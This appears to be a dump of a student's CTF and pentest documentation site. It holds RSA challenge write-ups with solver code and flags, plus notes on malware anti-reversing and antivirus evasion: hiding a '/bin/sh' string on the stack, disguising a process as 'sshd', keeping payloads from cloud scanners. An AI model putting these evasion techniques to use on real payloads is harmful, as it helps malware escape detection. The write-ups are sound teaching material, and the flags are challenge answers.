76 | Output :
77 | 
78 | ```
79 | p = 9197819956245901015631601728990631638418208717692563473742796988190206421909944935325440207929307570025064369215701041968300087653761740434804963205001243
80 | q = 11608699521692076588938849927650790786391400299291753998715515591405843662304289817989671652397169970366734483213463001368870446695719828643340099914142473
81 | m = b'picoCTF{proving_wiener_2635457}'
82 | ```


--------------------------------------------------------------------------------
/docs/crypto/rsa/09-polynomials-pq-generation.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: p & q generated using polynomials 
  3 | description: RSA - p and q generation 
  4 | ---
  5 | 
  6 | # p & q generated using polynomials 
  7 | 
  8 | ## Introduction
  9 | 
 10 | The variables `p` and `q` are generated with two polynomials of degree 6.
 11 | 
 12 | ```python
 13 | from Crypto.Util.number import *
 14 | 
 15 | p = 0
 16 | q = 0
 17 | 
 18 | while not (isPrime(p) and isPrime(q)):
 19 | 	x = getRandomNBitInteger(64)
 20 | 	p = 4*x**6 - 3*x**5 + 11*x**4 + 20*x**3 - 45*x**2 - 330*x - 17278375800565216289
 21 | 	q = 5*x**6 + 27*x**5 - 2*x**4 + 9*x**3 - 192*x**2 + 78*x + 10651084407042190747
 22 | 
 23 | flag = "REDACTED"
 24 | 
 25 | m = bytes_to_long(flag.encode())
 26 | 
 27 | e = 65537
 28 | n = p*q
 29 | c = pow(m, e, n)
 30 | 
 31 | print("n = ", n)
 32 | print("e = ", e)
 33 | print("c = ", c)
 34 | ```
 35 | 
 36 | ```python
 37 | n = 27661155682945406296834641714229496113140677805888382790421626659346711309446537965369777800574848759345203078671186013952201838877477218641554372916186800798088056028062582246032292303213542743992560935007190568490046409570447984281
 38 | e = 65537
 39 | c = 14671408702812896429694652959162813028288676202828966307809724394839552033486470729281236535989508878356172110388630226132307759882878757888207566185362724635740058625661145146348634360596698033503223911574509129656430741775326019844
 40 | ```
 41 | 
 42 | ## Solve 
 43 | 
 44 | > Write-up for the challenge `RSA 2` from `Midnight Flag Final 2023`.
 45 | 
 46 | To solve this challenge, it is possible to make a dichotomy between the minimum and maximum value of the random variable `x`. Once we know the value of `x`, we can generate `p` and `q` to obtain the flag.
 47 | 
 48 | To see if our `x` is correct, we can process `n = p * q` (this equation is based on the variable `x`).
 49 | 
 50 | ```python
 51 | from Crypto.Util.number import long_to_bytes 
 52 | 
 53 | 
 54 | n = 27661155682945406296834641714229496113140677805888382790421626659346711309446537965369777800574848759345203078671186013952201838877477218641554372916186800798088056028062582246032292303213542743992560935007190568490046409570447984281
 55 | e = 65537
 56 | c = 14671408702812896429694652959162813028288676202828966307809724394839552033486470729281236535989508878356172110388630226132307759882878757888207566185362724635740058625661145146348634360596698033503223911574509129656430741775326019844
 57 | 
 58 | p = lambda : 4*x**6 - 3*x**5 + 11*x**4 + 20*x**3 - 45*x**2 - 330*x - 17278375800565216289
 59 | q = lambda : 5*x**6 + 27*x**5 - 2*x**4 + 9*x**3 - 192*x**2 + 78*x + 10651084407042190747
 60 | pq = lambda : p() * q()
 61 | 
 62 | """
 63 | x = getRandomNBitInteger(64)
 64 | x is a random number between 2**63 and 2**64-1
 65 | """
 66 | min_x = pow(2, 63)
 67 | max_x = pow(2, 64) - 1
 68 | 
 69 | x = (max_x + min_x) // 2
 70 | res = pq()
 71 | while res != n:
 72 |     if res > n:
 73 |         max_x = x
 74 |     else:
 75 |         min_x = x + 1
 76 | 
 77 |     x = (max_x + min_x) // 2
 78 |     res = pq()
 79 | 
 80 | print("x =", x)
 81 | print("p =", p())
 82 | print("q =", q())
 83 | 
 84 | phi_n = (p() - 1) * (q() - 1)
 85 | d = pow(e, -1, phi_n)
 86 | m = pow(c, d, n)
 87 | print("d =", d)
 88 | print("m =", long_to_bytes(m))
 89 | ```
 90 | 
 91 | Output:
 92 | 
 93 | ```
 94 | x = 18269922023474656794
 95 | p = 148757939439736543528780916678183831111114502767353758676630055608563878936243914674090503384168040515494347763197559
 96 | q = 185947424299670679473569552539538103053284482082033361877830302959784260840170778721132728425964854540838167554043759
 97 | d = 26630884522805794523781658507423658189339216119754236546446174766897174066265449432579634406595826133629017706819615356481964336545389017365798082795009908086085965580006380901854971797142596705883091379681392251160435996488556530785
 98 | m = b'MCTF{cdbb393f8bb7f8c0162ecc6d42020c7c}'
 99 | ```
100 | 
101 | 


--------------------------------------------------------------------------------
/docs/index.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Welcome
 3 | description: Welcome to CTF Docs - Cheatsheets and write ups about pentest and CTF.
 4 | ---
 5 | 
 6 | # Welcome to CTF Docs
 7 | 
 8 | ## Introduction
 9 | 
10 | On this documentation website, you will find resources (cheatsheets, methodology, CTF write ups, ...) on the following topics :
11 | 
12 | - Android
13 | - Crypto
14 | - Malware
15 | - OSINT
16 | - Pentest
17 | - Pwn (binary exploitation)
18 | - Reverse engineering
19 | - Web
20 | - ...
21 | 
22 | !!! note ""
23 |     The documentation is constantly evolving so do not forget to **bookmark this website**.
24 | 
25 | ## Whoami
26 | 
27 | Infosec french student.
28 | 
29 | - :fontawesome-brands-twitter: : [@xanhacks](https://twitter.com/xanhacks)
30 | - :material-web: : [xanhacks.xyz](https://www.xanhacks.xyz)
31 | 


--------------------------------------------------------------------------------
/docs/malware/anti-reverse/02-compiler.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Compiler options
 3 | description: Debugging, symbols, optimization, complicated code, dynamic linking...
 4 | ---
 5 | 
 6 | # Compiler options
 7 | 
 8 | Hide debugging information and symbols. Use optimization and generates complicated code. Disable dynamic linking.
 9 | 
10 | ## -g
11 | 
12 | > Enable debugging information.
13 | 
14 | Debugging informations are stored in `.debug_*` sections.
15 | 
16 | Show all sections : `readelf -S ./binary`
17 | 
18 | ## -s
19 | 
20 | > Strip the binary (remove all symbol table and relocation information from the executable).
21 | 
22 | **.dynsym & .symtab** :
23 | 
24 | - `.dynsym` : will be loaded into memory when the program is started.
25 | - `.symtab` : will not be loaded into memory and is therefore not necessary to execute the program.
26 | - The section `.symtab` is removed by the `-s` flag.
27 | 
28 | Show symbols : `readelf --syms ./binary`
29 | 
30 | ## -fvisibility=hidden
31 | 
32 | > Hide all possible symbols.
33 | 
34 | ## -O3
35 | 
36 | > Optimization flag.
37 | 
38 | 1. -O1 : With -O, the compiler tries to reduce code size and execution time, without performing any optimizations that take a great deal of compilation time.
39 | 2. -O2 : Optimize even more. GCC performs nearly all supported optimizations that do not involve a space-speed tradeoff.
40 | 3. -O3 : All optimizations in -O2 plus a handful of others.
41 | 4. -Os : All -O2 optimizations that do not typically increase code size. It also performs further optimizations designed to reduce code size.
42 | 
43 | ## -funroll-loops
44 | 
45 | > Unroll or undo the looping structure of any loop whose iterations can be determined at compile time.
46 | 
47 | This will produce increasingly long and complicated code.
48 | 
49 | ## -static
50 | 
51 | > Prevents linking with the shared libraries.
52 | 
53 | `glibc`, the `libc` version shipped with many major Linux distros, is really not meant to be statically linked. When we do statically link it, some `libc`
54 | functionality gets broken and it makes our binary significantlly larger.
55 | 
56 | There are other versions of `libc` that are intended to be statically linked :
57 | 
58 | - diet libc
59 | - uClibc
60 | - musl libc
61 | 
62 | ```bash
63 | $ gcc -static reverse.c -o reverse
64 | $ du -h reverse
65 | 780K    reverse
66 | 
67 | $ musl-gcc -static reverse.c -o reverse
68 | $ du -h reverse
69 | 24K     reverse
70 | ```
71 | 
72 | Show dynamic section : `readelf -d <binary>`
73 | 
74 | Show external dependencies : `ldd <binary>`
75 | 
76 | If the binary doesn't have any dynamic dependencies, you cannot use `LD_PRELOAD` or `ltrace` to hook functions.
77 | 
78 | ## Conclusion
79 | 
80 | Combining all the options will result into the following command :
81 | 
82 | `musl-gcc -Wall -Wextra -Wshadow -s -fvisibility=hidden -O3 -funroll-loops -static main.c -o main`
83 | 
84 | ## References
85 | 
86 | - [Chapter 2 : Programming Linux Anti-Reversing Techniques](https://vxug.fakedoma.in/papers/VXUG/Mirrors/AntiReverseEngineeringLinux.pdf)
87 | 


--------------------------------------------------------------------------------
/docs/malware/anti-reverse/04-string.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Hide strings
 3 | description: Fighting off string analysis.
 4 | ---
 5 | 
 6 | # Hide strings
 7 | 
 8 | ## Stack strings
 9 | 
10 | Without stack strings :
11 | 
12 | ```c
13 | #include <stdio.h>
14 | #include <unistd.h>
15 | 
16 | int main() {
17 |         execve("/bin/sh", NULL, NULL);
18 | 
19 |         return 0;
20 | }
21 | ```
22 | 
23 | ```bash
24 | $ gcc main.c -o main
25 | $ strings main | grep "/bin/sh"
26 | /bin/sh
27 | $ gdb ./main
28 | gef➤  disass main
29 | Dump of assembler code for function main:
30 |    0x0000000000001139 <+0>:     push   rbp
31 |    0x000000000000113a <+1>:     mov    rbp,rsp
32 |    0x000000000000113d <+4>:     mov    edx,0x0
33 |    0x0000000000001142 <+9>:     mov    esi,0x0
34 |    0x0000000000001147 <+14>:    lea    rax,[rip+0xeb6]        # 0x2004
35 |    0x000000000000114e <+21>:    mov    rdi,rax
36 |    0x0000000000001151 <+24>:    call   0x1030 <execve@plt>
37 |    0x0000000000001156 <+29>:    mov    eax,0x0
38 |    0x000000000000115b <+34>:    pop    rbp
39 |    0x000000000000115c <+35>:    ret
40 | End of assembler dump.
41 | ```
42 | 
43 | With stack strings :
44 | 
45 | ```c
46 | cat main.c
47 | #include <stdio.h>
48 | #include <unistd.h>
49 | 
50 | int main(){
51 |         char slash = '/';
52 |         char bin_sh[] = { slash, 'b', 'i', 'n', slash, 's', 'h', 0 };
53 |         execve(bin_sh, NULL, NULL);
54 | 
55 |         return 0;
56 | }
57 | ```
58 | 
59 | ```bash
60 | $ gcc main.c -o main
61 | $ strings main | grep "/bin/sh"
62 | $ gdb ./main
63 | gef➤  disass main
64 | Dump of assembler code for function main:
65 | [...]
66 |    0x0000000000001160 <+23>:    mov    BYTE PTR [rbp-0x11],0x2f
67 |    0x0000000000001164 <+27>:    movzx  eax,BYTE PTR [rbp-0x11]
68 |    0x0000000000001168 <+31>:    mov    BYTE PTR [rbp-0x10],al
69 |    0x000000000000116b <+34>:    mov    BYTE PTR [rbp-0xf],0x62
70 |    0x000000000000116f <+38>:    mov    BYTE PTR [rbp-0xe],0x69
71 |    0x0000000000001173 <+42>:    mov    BYTE PTR [rbp-0xd],0x6e
72 |    0x0000000000001177 <+46>:    movzx  eax,BYTE PTR [rbp-0x11]
73 |    0x000000000000117b <+50>:    mov    BYTE PTR [rbp-0xc],al
74 |    0x000000000000117e <+53>:    mov    BYTE PTR [rbp-0xb],0x73
75 |    0x0000000000001182 <+57>:    mov    BYTE PTR [rbp-0xa],0x68
76 |    0x0000000000001186 <+61>:    mov    BYTE PTR [rbp-0x9],0x0
77 | [...]
78 | ```
79 | 
80 | ## Function Encryption
81 | 
82 | - Determine the function's size by using a linker script.
83 | 
84 | Default linker script : `gcc main.c -Wl,-verbose`
85 | 
86 | `-Wl,option` : Pass option as an option to the linker.
87 | 
88 | ## Use cipher
89 | 
90 | - XOR
91 | - RC4
92 | 
93 | ## References
94 | 
95 | - [Chapter 4 : Programming Linux Anti-Reversing Techniques](https://vxug.fakedoma.in/papers/VXUG/Mirrors/AntiReverseEngineeringLinux.pdf)


--------------------------------------------------------------------------------
/docs/malware/av-evasion.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Anti-Virus / Analysis Evasion
 3 | description: Anti-Virus and human analysis evasion.
 4 | ---
 5 | 
 6 | # Anti-Virus / Analysis evasion
 7 | 
 8 | ## Linux
 9 | 
10 | ### Rename a process
11 | 
12 | ```c
13 | #include <stdio.h>
14 | #include <sys/prctl.h>
15 | 
16 | int main() {
17 |     int status;
18 | 
19 |     status = prctl(PR_SET_NAME, "sshd", NULL, NULL, NULL);
20 |     getchar(); // hang to not die for demo
21 | }
22 | ```
23 | 
24 | ```
25 | $ ps -a
26 |     PID TTY          TIME CMD
27 |   23557 pts/4    00:00:00 sshd
28 |   23982 pts/5    00:00:00 ps
29 | ```
30 | 
31 | 
32 | ## Windows
33 | 
34 | ### PPID Spoofing
35 | 
36 | 
37 | 
38 | ### Development
39 | 
40 | 1. AV Fingerprinting
41 |     - Tools : [SharpEDRChecker](https://github.com/PwnDexter/SharpEDRChecker), [Seatbelt](https://github.com/GhostPack/Seatbelt)
42 |     - Social engineering
43 | 2. Replicates the victim environment to test our payloads
44 | 
45 | 
46 | !!! info
47 |     We should always disable any kind of cloud-based protection in the AV settings (potentially by outright disconnecting the VM from the internet) so that the AV doesn't upload our carefully crafted payloads to a server somewhere for analysis.
48 | 
49 | 
50 | - On-Disk evasion
51 | - In-Memory evasion


--------------------------------------------------------------------------------
/docs/malware/command_control.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Command & Control
 3 | description: Command & Control 101.
 4 | ---
 5 | 
 6 | # Command & Control
 7 | 
 8 | A command and control (C&C) infrastructure consists of servers and other technical infrastructure used to control malware in general, and, in particular, botnets.
 9 | 
10 | Command and control servers may be either directly controlled by the malware operators, or themselves run on hardware compromised by malware.
11 | 
12 | ## Vocabulary
13 | 
14 | - **Listeners** are fairly self-explanatory. They listen for a connection and facilitate further exploitation.
15 | - **Stagers** are essentially payloads generated by Empire to create a robust reverse shell in conjunction with a listener. They are the delivery mechanism for agents.
16 | - **Agents** are the equivalent of a Metasploit "Session". They are connections to compromised targets, and allow an attacker to further interact with the system.
17 | - **Modules** are used to in conjunction with agents to perform further exploitation. For example, they can work through an existing agent to dump the password hashes from the server.
18 | 
19 | ## Tools
20 | 
21 | - [CobaltStrike](https://www.cobaltstrike.com/)
22 | - [metasploit-framework](https://github.com/rapid7/metasploit-framework)
23 | - [Empire](https://github.com/BC-SECURITY/Empire/) as server & [Starkiller](https://github.com/BC-SECURITY/Starkiller/) as frontend
24 | - [PoshC2](https://github.com/nettitude/PoshC2)
25 | - [shad0w](https://github.com/bats3c/shad0w)
26 | - [merlin](https://github.com/Ne0nd0g/merlin)
27 | - [Covenant](https://github.com/cobbr/Covenant)


--------------------------------------------------------------------------------
/docs/malware/detection.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Malware Detection
 3 | description: How anti virus detect malwares.
 4 | ---
 5 | 
 6 | # Malware detection
 7 | 
 8 | ## Signature
 9 | 
10 | Malware detection by signature can be achieved in several ways :
11 | 
12 | - Comparison with a known malware `hash` (sha256, sha512, md5, ...)
13 | - The program matches multiple conditions or "rules" (like Yara rules)
14 |     - Looking for strings, regex, opcodes sequence
15 |     - Comparaison of imports table
16 |     - Hashes small sections of the file to check against the database
17 | 
18 | ## Behavioral
19 | 
20 | The potentially malicious program is run in a `sandbox` and its behaviour is analysed.
21 | 
22 | List of well-known `sandbox` : any.run, cuckoo, joe sandbox, ...
23 | 
24 | The purpose of the sandbox is to detect malicious behaviour, like :
25 | 
26 | - Unpacking of malicious code
27 | - Modifying configuration files or Windows registry
28 | - Observing key strokes
29 | - Spawning subprocess like `cmd.exe`
30 | - Data exfiltration
31 | - Attempting to persist on the host
32 | - ...
33 | 
34 | ### AMSI - Anti-Malware Scan Interface
35 | 
36 | AMSI is essentially a feature of Windows that scans scripts as they enter memory. It doesn't actually check the scripts itself, but it does provide hooks for AV publishers to use -- essentially allowing existing antivirus software to obtain a copy of the script being executed, scan it, and decide whether or not it's safe to execute.


--------------------------------------------------------------------------------
/docs/malware/others.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Others
 3 | description: Others
 4 | ---
 5 | 
 6 | # Others
 7 | 
 8 | ## Hidden files
 9 | 
10 | ```cmd
11 | C:\Users\[...]\AppData\Roaming>dir
12 | [...]
13 | 15/12/2022  13:30    <DIR>          .
14 | 15/12/2022  13:30    <DIR>          ..
15 | [...]
16 | C:\Users\[...]\AppData\Roaming>dir /a
17 | [...]
18 | 15/12/2022  13:30    <DIR>          .
19 | 15/12/2022  13:30    <DIR>          ..
20 | 08/11/2021  21:24            95 583 MicrosoftSearchIndexer
21 | [...]
22 | ```
23 | 
24 | Unhide a file :
25 | 
26 | ```
27 | C:\Users\[...]\AppData\Roaming>attrib
28 | A  SH            C:\Users\[...]\AppData\Roaming\MicrosoftSearchIndexer
29 | C:\Users\[...]\AppData\Roaming>attrib -s -h MicrosoftSearchIndexer
30 | C:\Users\[...]\AppData\Roaming>attrib
31 | A                C:\Users\[...]\AppData\Roaming\MicrosoftSearchIndexer
32 | ```


--------------------------------------------------------------------------------
/docs/malware/yara.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Yara
 3 | description: Tool helping malware researchers to identify and classify malware samples. 
 4 | ---
 5 | 
 6 | # Yara
 7 | 
 8 | ## Introduction
 9 | 
10 | Yara is a tool to help malware researchers to identify and classify malware samples. 
11 | 
12 | ## Basic rule
13 | 
14 | ```
15 | import "elf"
16 | import "hash"
17 | 
18 | rule Example {
19 |     meta:
20 |         author = "xanhacks"
21 |         description = "Check for the 'malware' string, ELF (x86_64), checksum, ..."
22 | 
23 |     strings:
24 |         $malware = "malware" nocase
25 | 
26 |     condition:
27 |         $malware and filesize < 200KB
28 |         and elf.machine == elf.EM_X86_64
29 |         and hash.sha256(0, filesize) == "4672c9c4de661309db41c93aa8ad7f24afdb68db51068cee588050eaf7bf67d7"
30 | }
31 | ```
32 | 
33 | ## Run yara
34 | 
35 | ```
36 | $ yara
37 | yara: wrong number of arguments
38 | Usage: yara [OPTION]... [NAMESPACE:]RULES_FILE... FILE | DIR | PID
39 | 
40 | Try `--help` for more options
41 | 
42 | $ yara basic.yara malware
43 | Example malware
44 | ```
45 | 
46 | ## Modules
47 | 
48 | You can use [modules](https://yara.readthedocs.io/en/latest/modules.html), like PE, ELF, Hash, Math, ...
49 | 
50 | ## Related tools
51 | 
52 | - [Loki](https://github.com/Neo23x0/Loki) : Scanner for Simple Indicators of Compromise.
53 | - [yarGen](https://github.com/Neo23x0/yarGen) : yarGen is a generator for YARA rules.
54 | 


--------------------------------------------------------------------------------
/docs/others/devsecops.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: DevSecOps
 3 | description: DevSecOps
 4 | ---
 5 | 
 6 | # DevSecOps
 7 | 
 8 | DevSecOps is a term that refers to the integration of security practices into the software development and operations process. The main objective of devsecops is to make security an integral part of the software development lifecycle, rather than treating it as an afterthought. This approach enables organizations to build and deploy secure applications more quickly and efficiently, while also reducing the risk of security breaches and vulnerabilities.
 9 | 
10 | **Pros :**
11 | 
12 | - Detect vulnerabilies faster
13 | - Detect more vulnerabilies
14 | 
15 | **Cons :**
16 | 
17 | - False positives
18 | - Vulnerabilites triage
19 | 
20 | ## Methodology
21 | 
22 | - Vulnerability checks in dependencies
23 | - SAST
24 |     - Code analysis
25 |         - IDE
26 |         - Pre-commit
27 |         - Pipeline
28 | - DAST
29 | - Vulnerabilties management
30 | 
31 | ## Tools
32 | 
33 | ### Vulnerability checks in dependencies
34 | 
35 | - dependency check
36 | - snyk
37 | - trivy
38 | - ...
39 | 
40 | ### SAST
41 | 
42 | - lint*
43 | - SonarQube
44 | - ...
45 | 
46 | ### DAST
47 | 
48 | - nuclei
49 | - OWASP ZAP
50 | - ...
51 | 
52 | ### Vulnerabilties management
53 | 
54 | - DefectDojo


--------------------------------------------------------------------------------
/docs/others/linux/commands/find.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: find
 3 | description: find - search for files in a directory hierarchy.
 4 | ---
 5 | 
 6 | # find - search for files in a directory hierarchy
 7 | 
 8 | Find SUID bit.
 9 | 
10 | ```
11 | $ find / -perm /4000 -user root -type f -ls 2>/dev/null
12 |  13501117     56 -rwsr-xr-x   1 root     root        54096 Jul 27  2018 /usr/bin/chfn
13 |  13501166     84 -rwsr-xr-x   1 root     root        84016 Jul 27  2018 /usr/bin/gpasswd
14 |  13501219     64 -rwsr-xr-x   1 root     root        63736 Jul 27  2018 /usr/bin/passwd
15 |  13501209     44 -rwsr-xr-x   1 root     root        44440 Jul 27  2018 /usr/bin/newgrp
16 |  13501120     44 -rwsr-xr-x   1 root     root        44528 Jul 27  2018 /usr/bin/chsh
17 |  13500615     64 -rwsr-xr-x   1 root     root        63568 Jan 10  2019 /bin/su
18 |  13500597     52 -rwsr-xr-x   1 root     root        51280 Jan 10  2019 /bin/mount
19 |  13500622     36 -rwsr-xr-x   1 root     root        34888 Jan 10  2019 /bin/umount
20 | ```
21 | 
22 | Find files creation between two date.
23 | 
24 | ```
25 | $ find / -perm /4000 -user root -type f -newermt '28 jul 2018 00:00:00' ! -newermt '11 jan 2019 00:00:00' -ls 2>/dev/null
26 |  13500615     64 -rwsr-xr-x   1 root     root        63568 Jan 10  2019 /bin/su
27 |  13500597     52 -rwsr-xr-x   1 root     root        51280 Jan 10  2019 /bin/mount
28 |  13500622     36 -rwsr-xr-x   1 root     root        34888 Jan 10  2019 /bin/umount
29 | $ find . -newermt '2022-02-10' 2>/dev/null
30 | ```
31 |  
32 |  Find files of a specific user with a name that match a regex.
33 |  
34 | ```
35 | $ find / -user www-data -name '*.conf' -type f 2>/dev/null
36 | /var/www/html/ecommerce/database.conf
37 | ```
38 | 


--------------------------------------------------------------------------------
/docs/others/linux/commands/socat.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: socat
 3 | description: socat - Multipurpose relay (SOcket CAT).
 4 | ---
 5 | 
 6 | # socat - Multipurpose relay (SOcket CAT)
 7 | 
 8 | ## Port forwarding
 9 | 
10 | From `localhost:8888` to `10.2.130.7:4444`.
11 | 
12 | ```bash
13 | $ socat TCP4-LISTEN:8888,reuseaddr,fork TCP4:10.2.130.7:4444
14 | ```
15 | 
16 | ## TCP to program
17 | 
18 | ```bash
19 | $ socat TCP-LISTEN:9001,reuseaddr,fork,forever,keepalive EXEC:'python3 example.py'
20 | ```
21 | 
22 | > References [www.redhat.com](https://www.redhat.com/sysadmin/getting-started-socat).


--------------------------------------------------------------------------------
/docs/others/linux/commands/stat.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: stat
 3 | description: stat - display file or file system status.
 4 | ---
 5 | 
 6 | # stat - display file or file system status
 7 | 
 8 | ```
 9 | $ stat /etc/passwd
10 |   File: /etc/passwd
11 |   Size: 965             Blocks: 8          IO Block: 4096   regular file
12 | Device: 2eh/46d Inode: 13631986    Links: 1
13 | Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
14 | Access: 2021-09-03 07:48:11.000000000 +0000
15 | Modify: 2021-09-03 07:48:11.000000000 +0000
16 | Change: 2021-09-12 19:40:02.730102800 +0000
17 |  Birth: -
18 | ```
19 | 
20 | The system files have the milliseconds of the `Modify` date set to `000000000`. If this is not the case, the user has probably installed the file by hand.


--------------------------------------------------------------------------------
/docs/others/linux/commands/xargs.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: xargs
 3 | description: xargs - build and execute command lines from standard input.
 4 | ---
 5 | 
 6 | # xargs - build and execute command lines from standard input
 7 | 
 8 | ## Threading
 9 | - `-n max-args` : Use  at most max-args arguments per command line.
10 | - `-P max-procs` : Run up to max-procs processes at a time.
11 | 
12 | ```bash
13 | $ echo "https://github.com/HeroCTF/HeroCTF_v3\n" \
14 | 	"https://github.com/HeroCTF/HeroCTF_v2\n" \
15 | 	"https://github.com/HeroCTF/HeroCTF_v1" \
16 | 	| xargs -n1 -P3 git clone
17 | Cloning into 'HeroCTF_v3'...
18 | Cloning into 'HeroCTF_v2'...
19 | Cloning into 'HeroCTF_v1'...
20 | remote: Enumerating objects: 1047, done.
21 | remote: Enumerating objects: 3109, done.
22 | remote: Enumerating objects: 835, done.
23 | remote: Counting objects: 100% (381/381), done.
24 | remote: Compressing objects: 100% (347/347), done.
25 | remote: Counting objects: 100% (178/178), done.
26 | [...]
27 | ```
28 | 
29 | - `-a file` : Read items from file instead of standard input.
30 | 
31 | ```bash
32 | $ cat git_urls.lst
33 | https://github.com/HeroCTF/HeroCTF_v3
34 | https://github.com/HeroCTF/HeroCTF_v2
35 | https://github.com/HeroCTF/HeroCTF_v1
36 | $ xargs -a git_urls.lst -P3 -n1 git clone
37 | Cloning into 'HeroCTF_v3'...
38 | Cloning into 'HeroCTF_v2'...
39 | Cloning into 'HeroCTF_v1'...
40 | [...]
41 | ```


--------------------------------------------------------------------------------
/docs/others/others.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Others
 3 | description: Others.
 4 | ---
 5 | 
 6 | # Others
 7 | 
 8 | ## UTF-8 rockyou
 9 | 
10 | ```bash
11 | $ iconv -f ISO-8859-1 -t UTF-8 rockyou.txt > rockyou_utf8.txt
12 | ```
13 | 
14 | ## Edit binary file
15 | 
16 | ```
17 | $ xxd -ps binary > binary.hex
18 | $ vim binary.hex
19 | $ xxd -r -ps binary.hex
20 | ```
21 | 
22 | ## Self-signed HTTPs certificates
23 | 
24 | openssl command :
25 | 
26 | ```bash
27 | openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout cert.key -out cert.crt
28 | ```
29 | 
30 | nginx config :
31 | 
32 | ```
33 |     ssl_certificate /etc/nginx/certs/cert.crt;
34 | 	ssl_certificate_key /etc/nginx/certs/cert.key;
35 | ```
36 | 
37 | ## Certbot - Let's Encrypt
38 | 
39 | ```
40 | $ sudo apt install -y python3-certbot-nginx
41 | $ certbot -d domain.com --manual --preferred-challenges dns certonly
42 | [...]
43 | Ask for TXT DNS entry
44 | 
45 | $ dig TXT _acme-challenge.domain.com
46 | [...]
47 | _acme-challenge.domain.com. 3585 IN TXT  "8E5TrjR230ThxG2RntJYnaJcslXOx5DsDki40T11_GU"
48 | 
49 | cd /etc/letsencrypt/archive/domain.com
50 | $ ls
51 | cert1.pem  chain1.pem  fullchain1.pem  privkey1.pem
52 | ```


--------------------------------------------------------------------------------
/docs/others/tmux-cheatsheet.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Tmux cheatsheet
 3 | description: Tmux shortcut combinaison and description.
 4 | ---
 5 | 
 6 | # Tmux cheatsheet
 7 | 
 8 | **tmux** is a terminal multiplexer : it enables a number of terminals to be created, accessed, and controlled from a single screen. tmux may be detached from a screen and continue running in the background, then later reattached
 9 | 
10 | ## Shortcuts
11 | 
12 | - `CTRL + B` + `c` : Create a new window.
13 | - `CTRL + B` + `,` : Rename a window.
14 | - `CTRL + B` + `"` : Create a new pane (horizontally and below the current pane).
15 | - `CTRL + B` + `%` : Create a new pane (vertically and to the right of the current pane).
16 | - `CTRL + B` + `!` : Transform a pane to a new window.
17 | - `CTRL + B` + `z` : Enable / Disable the zoom mode on a pane.
18 | - `CTRL + B` + `x` : Kill the current pane.
19 | - `CTRL + B` + `arrow` : Resize the current pane.
20 | - `CTRL + B` + `[0-9]` : Switch to the window n°[0-9].
21 | - `CTRL + B` + `{` : Move the current pane to the left.
22 | - `CTRL + B` + `}` : Move the current pane to the right.
23 | - `CTRL + B` + `[` : Enter in *copy* mode.
24 | - `CTRL` + `S` : Search text (only on *copy* mode).
25 | - `CTRL+B` + `s` : Select a running session.
26 | 
27 | ## Configuration
28 | 
29 | The **tmux** configuration file is located at `~/.tmux.conf`.
30 | 
31 | ### Default shell
32 | 
33 | ```
34 | set -g default-shell /usr/bin/fish
35 | ```
36 | 
37 | ### New window / pane come with the current path
38 | 
39 | ```
40 | bind c new-window -c "#{pane_current_path}"
41 | bind '"' split-window -c "#{pane_current_path}"
42 | bind % split-window -h -c "#{pane_current_path}"
43 | ```


--------------------------------------------------------------------------------
/docs/others/vim-cheatsheet.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Vim cheatsheet
 3 | description: Vim shortcut combinaison and description.
 4 | ---
 5 | 
 6 | # Vim - Vi IMproved
 7 | 
 8 | ## Execute current script
 9 | 
10 | `%` refers to the current script name.
11 | 
12 | ```
13 | !./%
14 | ```
15 | 
16 | ## sed
17 | 
18 | ### Using groups
19 | 
20 | Before :
21 | 
22 | ```
23 | - first_group second_group
24 | - hello world
25 | ```
26 | 
27 | sed command :
28 | 
29 | ```
30 | :%s/- \(.*\) \(.*\)$/- \2 \1/g
31 | ```
32 | 
33 | After :
34 | 
35 | ```
36 | - second_group first_group
37 | - world hello
38 | ```
39 | 
40 | ### New lines
41 | 
42 | Before :
43 | 
44 | ```
45 | hello:world:!
46 | ```
47 | 
48 | sed command :
49 | 
50 | ```
51 | :%s/:/^M/g
52 | ```
53 | 
54 | Where the `^M` is typed by pressing control-V (control-Q on Windows) followed by the Enter/Return key.
55 | 
56 | After :
57 | 
58 | ```
59 | hello
60 | world
61 | !
62 | ```
63 | 
64 | To go back you can do this command :
65 | 
66 | ```
67 | :%s/\n/:/g
68 | ```
69 | 
70 | Output :
71 | 
72 | ```
73 | hello:world:!:
74 | ```
75 | 
76 | ## grep
77 | 
78 | Before :
79 | 
80 | ```
81 | https://google.com/
82 | https://maps.google.com/
83 | https://example.com
84 | https://drive.google.com/
85 | ```
86 | 
87 | grep command :
88 | 
89 | ```
90 | :%!grep -v google\.com
91 | ```
92 | 
93 | After :
94 | 
95 | ```
96 | https://example.com
97 | ```


--------------------------------------------------------------------------------
/docs/pentest/active-directory/02-kerberos.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Introduction to Kerberos
 3 | description: Introduction to Kerberos.
 4 | ---
 5 | 
 6 | 
 7 | # Kerberos - Introduction
 8 | 
 9 | **Definition :** Kerberos is the default authentication service for Microsoft Windows domains. It is intended to be more "secure" than NTLM by using third party ticket authorization as well as stronger encryption.
10 | 
11 | ## Terms
12 | 
13 | - **Ticket Granting Ticket (TGT)** - A ticket-granting ticket is an authentication ticket used to request service tickets from the TGS for specific resources from the domain.
14 | - **Key Distribution Center (KDC)** - The Key Distribution Center is a service for issuing TGTs and service tickets that consist of the Authentication Service and the Ticket Granting Service.
15 | - **Authentication Service (AS)** - The Authentication Service issues TGTs to be used by the TGS in the domain to request access to other machines and service tickets.
